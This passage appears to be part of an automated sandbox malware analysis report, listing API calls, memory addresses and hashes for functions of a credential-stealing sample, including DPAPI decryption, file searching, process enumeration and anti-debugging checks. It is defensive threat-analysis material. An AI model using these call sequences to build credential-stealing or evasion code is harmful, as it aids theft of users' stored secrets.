                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID: \*.*$@
                                              • API String ID: 433455689-2355794846
                                              • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                              • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                              • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                              • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042510C,?,?,?,004251B4,?,?,00000000,?,00000000), ref: 047E1B8A
                                              • StrCmpCA.SHLWAPI(?,0042525C), ref: 047E1BDA
                                              • StrCmpCA.SHLWAPI(?,00425304), ref: 047E1BF0
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 047E1FA7
                                              • DeleteFileA.KERNEL32(00000000), ref: 047E2031
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047E2087
                                              • FindClose.KERNEL32(000000FF), ref: 047E2099
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 1415058207-0
                                              • Opcode ID: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                                              • Instruction ID: 44e907f23e100571cfb1656d23835e89534102c6913ac63f0834d9f043b3fede
                                              • Opcode Fuzzy Hash: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                                              • Instruction Fuzzy Hash: 7512CB719102189BDB29FB60DDA9EED7379AF54308F4045ADA60A62390EF707F89CF50
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 047EE0C5
                                              • StrCmpCA.SHLWAPI(?,004214C8), ref: 047EE115
                                              • StrCmpCA.SHLWAPI(?,004214CC), ref: 047EE12B
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047EE647
                                              • FindClose.KERNEL32(000000FF), ref: 047EE659
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2325840235-0
                                              • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                              • Instruction ID: 99a3058cf8b4f7ff2fe3934e193a0243cb4e622b749624e391cc9e7d3be36057
                                              • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                              • Instruction Fuzzy Hash: 49F19F71914218DADB29EB60DDA8EEE7339AF54304F4045EAA14E62350EF347F89CE50
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                              • LocalFree.KERNEL32(00000000), ref: 00417D22
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID: /
                                              • API String ID: 3090951853-4001269591
                                              • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                              • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                              • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                              • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                              APIs
                                              • memset.MSVCRT ref: 0040C853
                                              • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02BE5C10), ref: 0040C871
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                              • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                              • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                              • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                              • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                              • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                              • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                              • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                              APIs
                                              • memset.MSVCRT ref: 047ECABA
                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 047ECAD8
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 047ECAE3
                                              • memcpy.MSVCRT(?,?,?), ref: 047ECB79
                                              • lstrcat.KERNEL32(?,00420B46), ref: 047ECBAA
                                              • lstrcat.KERNEL32(?,00420B47), ref: 047ECBBE
                                              • lstrcat.KERNEL32(?,00420B4E), ref: 047ECBDF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                              • Instruction ID: 82510f9ada3c87c6ec2bb85940b4fbf6d2de24a4c7a17086facc139edf546a9c
                                              • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                              • Instruction Fuzzy Hash: 55416278944219EFDB10DFD4DC88BFEBBB9BB48304F1045A8E509A6280D7746B84CF95
                                              APIs
                                              • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02BE5AC0,?,0042110C,?,00000000,?), ref: 0041696C
                                              • sscanf.NTDLL ref: 00416999
                                              • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02BE5AC0,?,0042110C), ref: 004169B2
                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02BE5AC0,?,0042110C), ref: 004169C0
                                              • ExitProcess.KERNEL32 ref: 004169DA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID: B
                                              • API String ID: 2533653975-2248957098
                                              • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                              • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                              • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                              • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                              • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID: N@
                                              • API String ID: 4291131564-4229412743
                                              • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                              • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                              • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                              • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 047F7E48
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 047F7E60
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 047F7E74
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 047F7EC9
                                              • LocalFree.KERNEL32(00000000), ref: 047F7F89
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID:
                                              • API String ID: 3090951853-0
                                              • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                              • Instruction ID: f1cf6653aaa7fb041876ec45298fc07d3abed867f24f5f8785cedc426cdbf2aa
                                              • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                              • Instruction Fuzzy Hash: 91410871950218ABDB24DB94DC98BEDB3B5FB44704F104199E209A6390EB742F89CF91
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                              • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                              • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                              • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                              • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                              • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 047FBE09
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 047FBE1E
                                              • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 047FBE29
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 047FBE45
                                              • TerminateProcess.KERNEL32(00000000), ref: 047FBE4C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                              • Instruction ID: bc45149e38a039c31509eb2c95b75938c9b441434be1d29d3fbf82f589db7aa2
                                              • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                              • Instruction Fuzzy Hash: 3621A3BC900205DFDB14DF69FC896963BE4FB0A314F504039E90997364EBB46981EF49
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 3657800372-0
                                              • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                              • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                              • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                              • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 047E74B4
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047E74BB
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 047E74E8
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 047E750B
                                              • LocalFree.KERNEL32(?), ref: 047E7515
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 2609814428-0
                                              • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                              • Instruction ID: 9b1c5b1008ff5a0dd033c5bf3f2349142e71dd4b4674289d14ef8527eb6f7b94
                                              • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                              • Instruction Fuzzy Hash: A6010075B80208BBEB14DFD4DD45FAD77B9EB48704F104155F705BA2C0D670AA008B65
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                              • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                              • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                              • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                              • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                              • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                              • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047F9885
                                              • Process32First.KERNEL32(00420ACA,00000128), ref: 047F9899
                                              • Process32Next.KERNEL32(00420ACA,00000128), ref: 047F98AE
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 047F98C3
                                              • CloseHandle.KERNEL32(00420ACA), ref: 047F98E1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                              • Instruction ID: 105caf57fd4aac312c2dbf22a5643d662bccc60e6fd94dba3d51484c0bd3a406
                                              • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                              • Instruction Fuzzy Hash: 90010CB9A50208FFDB20DFE5CD54BEDB7F9EB49700F004189A605A6340D774AA44DF51
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 047EE709
                                              • StrCmpCA.SHLWAPI(?,004214F8), ref: 047EE759
                                              • StrCmpCA.SHLWAPI(?,004214FC), ref: 047EE76F
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047EEE46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID:
                                              • API String ID: 433455689-0
                                              • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                              • Instruction ID: 127d20a6c369ecbd96534f284bf38456673eb0b849789dcc0bd453564221b395
                                              • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                              • Instruction Fuzzy Hash: C912CF71A102189BEB28FB60DD69EED7379AF54308F4045ADA60E56390EE347B8CCF51
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                              • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                              • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                              • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,047E53EB,40000001,00000000,00000000,?,047E53EB), ref: 047F9127
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                              • Instruction ID: b969d608648ab47d88d41ae16b1dc7cda20c359f57f6870f4c47c28ac4669696
